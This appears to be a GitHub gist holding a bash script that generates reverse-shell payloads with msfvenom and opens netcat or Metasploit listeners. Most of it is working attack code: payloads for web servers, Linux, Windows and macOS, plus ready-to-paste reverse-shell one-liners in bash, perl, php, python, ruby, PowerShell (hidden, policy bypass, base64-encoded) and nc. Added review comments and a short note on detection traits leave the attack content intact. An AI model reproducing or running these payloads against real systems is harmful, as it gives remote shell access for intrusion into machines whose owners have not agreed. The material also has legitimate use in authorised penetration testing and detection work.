
@danieljs777
Last active March 26, 2021 22:52
CreateShell v0.1 - A fast way to generate payloads and open listeners for reverse shells
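#!/bin/bash
# CreateShell v0.1 - wrapper around msfvenom, nc and msfconsole.
# Usage: createshell.sh lhost lport payload
#
# Argument handling. All three positionals are required by the code below:
# $1 (lhost) and $2 (lport) are passed unquoted to msfvenom and nc, and are
# interpolated into the semicolon-separated command string given to
# `msfconsole -x` at the end of the script; $3 selects the case arm.

# Print the help banner on stdout.
print_usage() {
  printf '%s\n' \
    "##############################################################" \
    "# CreateShell v0.1 - A fast way to generate payloads and open listeners for reverse shells" \
    "# By Daniel (daniel@zillius.com.br) " \
    "# Usage: createshell.sh lhost lport payload " \
    "#" \
    "# MSF short payloads : " \
    "# [php|jsp|war|asp|python|bash|perl|linux32|linux64|win32|win64|osx]" \
    "# OR [msfvenom_default_payload]" \
    "#" \
    "# Raw payloads : " \
    "# [rawbash|rawbash2|rawperl|rawphp|rawphp_shellexec|rawphp_system|rawpython|rawps|rawps2|rawps_base64|rawruby|rawnc]"
}

# No arguments at all: show help and leave, as before.
if [ $# -eq 0 ]; then
  print_usage
  exit
fi

# One or two arguments used to fall into the custom-payload arm with an
# empty $3; treat that as a usage error instead.
if [ $# -lt 3 ]; then
  print_usage >&2
  exit 2
fi

# lhost: allow only characters found in host names and IPv4/IPv6 literals,
# so whitespace or ';' cannot split arguments or add commands to the
# `msfconsole -x` string.
case "$1" in
  '' | *[!A-Za-z0-9._:-]*)
    printf 'createshell: invalid lhost: %s\n' "$1" >&2
    exit 2
    ;;
esac

# lport: digits only, within the TCP port range.
case "$2" in
  '' | *[!0-9]*)
    printf 'createshell: lport must be a number: %s\n' "$2" >&2
    exit 2
    ;;
esac
if ! [ "$2" -ge 1 ] 2>/dev/null || ! [ "$2" -le 65535 ] 2>/dev/null; then
  printf 'createshell: lport out of range (1-65535): %s\n' "$2" >&2
  exit 2
fi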
# Dispatch on the third argument ($3).
#  - The msfvenom arms set $payload, write the generated file to shell.<ext>
#    in the current directory (overwriting any existing file of that name)
#    and then continue to the handler step after `esac`.
#  - The raw* arms print a one-liner built from $1/$2, start a netcat
#    listener on port $2 and `exit`, so the handler step is never reached
#    for them.
# NOTE(review): $1 and $2 are expanded unquoted throughout this block, so
# they are subject to word splitting and globbing.
case "$3" in
#############################
#WEB SERVERS
# Each arm maps a short name to an msfvenom payload and output format.
"php")
payload="php/meterpreter_reverse_tcp";
echo "Generating $payload";
msfvenom -p $payload LHOST=$1 LPORT=$2 -f raw > shell.php;
;;
"jsp")
payload="java/jsp_shell_reverse_tcp";
echo "Generating $payload";
msfvenom -p $payload LHOST=$1 LPORT=$2 -f raw > shell.jsp;
;;
# Same payload as "jsp", emitted in war format.
"war")
payload="java/jsp_shell_reverse_tcp";
echo "Generating $payload";
msfvenom -p $payload LHOST=$1 LPORT=$2 -f war > shell.war;
;;
"asp")
payload="windows/meterpreter/reverse_tcp";
echo "Generating $payload";
msfvenom -p $payload LHOST=$1 LPORT=$2 -f asp > shell.asp;
;;
#############################
#LOCAL INTERPRETERS
"python")
payload="cmd/unix/reverse_python";
echo "Generating $payload";
msfvenom -p $payload LHOST=$1 LPORT=$2 -f raw > shell.py
;;
"bash")
payload="cmd/unix/reverse_bash";
echo "Generating $payload";
msfvenom -p $payload LHOST=$1 LPORT=$2 -f raw > shell.sh
;;
"perl")
payload="cmd/unix/reverse_perl";
echo "Generating $payload";
msfvenom -p $payload LHOST=$1 LPORT=$2 -f raw > shell.pl
;;
#############################
#OPERATING SYSTEMS
# linux32 and linux64 both write shell.elf, and win32 and win64 both write
# shell.exe, so running one after the other replaces the earlier file.
"linux32")
payload="linux/x86/meterpreter/reverse_tcp";
echo "Generating $payload";
msfvenom -p $payload LHOST=$1 LPORT=$2 -f elf > shell.elf
;;
"linux64")
payload="linux/x64/meterpreter/reverse_tcp";
echo "Generating $payload";
msfvenom -p $payload LHOST=$1 LPORT=$2 -f elf > shell.elf
;;
"win32")
payload="windows/meterpreter/reverse_tcp";
echo "Generating $payload";
msfvenom -p $payload LHOST=$1 LPORT=$2 -f exe > shell.exe
;;
"win64")
payload="windows/x64/meterpreter/reverse_tcp";
echo "Generating $payload";
msfvenom -p $payload LHOST=$1 LPORT=$2 -f exe > shell.exe
;;
"osx")
payload="osx/x86/shell_reverse_tcp";
echo "Generating $payload";
msfvenom -p $payload LHOST=$1 LPORT=$2 -f macho > shell.macho
;;
#############################
#RAW CONNECTIONS WITHOUT NC ON TARGET
# These arms only print text and open a local listener; nothing is written
# to disk and $payload stays unset.
# Defender note: the printed one-liners have recognisable command-line
# traits that show up in process-creation logs: `/dev/tcp/` redirection
# from bash, an interpreter started with an inline socket-connect script
# (perl -e, php -r, python -c, ruby -rsocket -e), PowerShell started with
# `-NoP -NonI -W Hidden -Exec Bypass` or `-e`, and a `mkfifo` pipe into nc.
"rawbash")
echo '###########################';
echo 'Type at target: ';
echo 'bash -i >& /dev/tcp/'$1'/'$2' 0>&1';
echo '';
echo '###########################';
nc -lvnp $2;
exit;
;;
"rawbash2")
echo '###########################';
echo 'Type at target: ';
echo '0<&196;exec 196<>/dev/tcp/'$1'/'$2'; bash <&196 >&196 2>&196';
echo '';
echo '###########################';
nc -lvnp $2;
exit;
;;
"rawperl")
echo '###########################';
echo 'Type at target: ';
echo "perl -e 'use Socket;"'$i="'$1'";''$p='$2';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'"'";
echo '';
echo '###########################';
nc -lvnp $2;
exit;
;;
# The three rawphp* arms differ only in the PHP function named in the
# printed text (exec, shell_exec, system).
"rawphp")
echo '###########################';
echo 'Type at target: ';
echo "php -r '"'$sock=fsockopen("'$1'",'$2');exec("/bin/sh -i <&3 >&3 2>&3");'"'";
echo '';
echo '###########################';
nc -lvnp $2;
exit;
;;
"rawphp_shellexec")
echo '###########################';
echo 'Type at target: ';
echo "php -r '"'$sock=fsockopen("'$1'",'$2');shell_exec("/bin/sh -i <&3 >&3 2>&3");'"'";
echo '';
echo '###########################';
nc -lvnp $2;
exit;
;;
"rawphp_system")
echo '###########################';
echo 'Type at target: ';
echo "php -r '"'$sock=fsockopen("'$1'",'$2');system("/bin/sh -i <&3 >&3 2>&3");'"'";
echo '';
echo '###########################';
nc -lvnp $2;
exit;
;;
"rawpython")
echo '###########################';
echo 'Type at target: ';
echo "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("'"'$1'"'","$2"));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["'"/bin/sh"'","'"-i"'"]);'";
echo '';
echo '###########################';
nc -lvnp $2;
exit;
;;
"rawps")
echo '###########################';
echo 'Type at target: ';
echo 'powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("'$1'",'$2');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()';
echo '';
echo '###########################';
nc -lvnp $2;
exit;
;;
"rawps2")
echo '###########################';
echo 'Type at target: ';
echo "powershell -nop -c \"\$client = New-Object System.Net.Sockets.TCPClient('"$1"',"$2");\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + '"'PS '"' + (pwd).Path + '"'> '"';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\"";
echo '';
echo '###########################';
nc -lvnp $2;
exit;
;;
# Prints the `powershell -e ` prefix on one line, then the script text
# piped through base64 on the following line(s).
"rawps_base64")
echo '###########################';
echo 'Type at target: ';
echo 'powershell -e ';
echo '$client = New-Object System.Net.Sockets.TCPClient("'$1'",'$2');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | base64;
echo '';
echo '###########################';
nc -lvnp $2;
exit;
;;
# NOTE(review): "rawruby" is handled here but is not listed in the usage
# text printed when the script is run without arguments.
"rawruby")
echo '###########################';
echo 'Type at target: ';
echo "ruby -rsocket -e'f=TCPSocket.open(\""$1\"","$2").to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'";
echo '';
echo '###########################';
nc -lvnp $2;
exit;
;;
"rawnc")
echo '###########################';
echo 'Type at target: ';
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc "$1" "$2" >/tmp/f";
echo '';
echo '###########################';
nc -lvnp $2;
exit;
;;
# Default arm: any other $3 is taken as a full msfvenom payload name, and
# the output format and file extension are read from stdin.
# NOTE(review): the line below starts with `echo`, so it writes the
# msfvenom command text into shell.$extension; msfvenom itself is not run
# in this arm.
# NOTE(review): `read` is used without -r, and $format / $extension are
# expanded unquoted, including in the redirect target.
*)
echo '###########################';
echo 'Right! Custom payload detected! Please input your desired format:'
read format
echo 'Right! Please input desired final extension:'
read extension
echo msfvenom -p $3 LHOST=$1 LPORT=$2 -f $format > shell.$extension;
payload="$3";
;;
esac
# Handler step. Reached only by the case arms above that set $payload; the
# raw* arms exit before this point.
# $payload, $1 (lhost) and $2 (lport) are pasted into one semicolon-separated
# command string for `msfconsole -x`, which loads exploit/multi/handler and
# runs it as a background job (`exploit -j -z`) with ExitOnSession false.
if [ -n "$payload" ]; then
  handler_cmds="use exploit/multi/handler;set PAYLOAD $payload;set LHOST $1;set LPORT $2;set ExitOnSession false;exploit -j -z"
  msfconsole -x "$handler_cmds"
else
  echo "Payload missed"
fi